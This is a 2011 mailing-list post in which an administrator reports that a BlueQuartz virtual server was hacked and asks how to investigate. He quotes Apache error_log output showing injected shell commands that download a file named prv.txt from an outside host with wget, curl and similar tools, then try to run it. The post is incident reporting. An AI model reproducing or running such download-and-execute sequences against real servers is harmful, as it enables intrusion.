[BlueOnyx:08816] vps hacked

Steffan general at ziggo.nl
Thu Oct 13 07:07:29 -05 2011 

I still have a client with a BlueQuartz server (vps)

 

This morning the virtual server was hacked

I looked in the logs and found this in /var/log/httpd/error_log

 

 

 

[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable
variant: /usr/sausalito/ui/web/error/fileNotFound.html

--00:07:40--  http://rapha.altervista.org/prv.txt

           => `prv.txt'

Resolving rapha.altervista.org... 46.4.65.68

Connecting to rapha.altervista.org|46.4.65.68|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 28,039 (27K) [text/plain]

 

    0K .......... .......... .......                         100% 1015.53
KB/s

 

00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]

 

sh: line 1: lwp-downlod: command not found

sh: line 1: fetch: command not found

sh: line 2: rapha.altervista.org/prv.txt: No such file or directory

  % Total    % Received % Xferd  Average Speed   Time    Time     Time
Current

                                 Dload  Upload   Total   Spent    Left
Speed

^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:--
98324^M100 28039  100 28039    0     0   403k      0 --:--:-- --:--:--
--:--:--  899k

sh: line 3: prv.txt: command not found

--00:07:40--  http://rapha.altervista.org/prv.txt

           => `prv.txt'

Resolving rapha.altervista.org... 46.4.65.68

Connecting to rapha.altervista.org|46.4.65.68|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 28,039 (27K) [text/plain]

 

    0K .......... .......... .......                         100% 1020.34
KB/s

 

00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]

 

sh: line 1: lwp-downlod: command not found

sh: line 1: fetch: command not found

sh: line 2: rapha.altervista.org/prv.txt: No such file or directory

  % Total    % Received % Xferd  Average Speed   Time    Time     Time
Current

                                 Dload  Upload   Total   Spent    Left
Speed

^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:--
42493^M100 28039  100 28039    0     0   507k      0 --:--:-- --:--:--
--:--:-- 1048k

sh: line 3: prv.txt: command not found

 

I don't see any admin logins

How can I find out what happened
I dont see anything weird in the access log or message log

 

Thanxs Steffan

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.blueonyx.it/pipermail/blueonyx/attachments/20111013/2232e439/attachment.html>

More information about the Blueonyx mailing list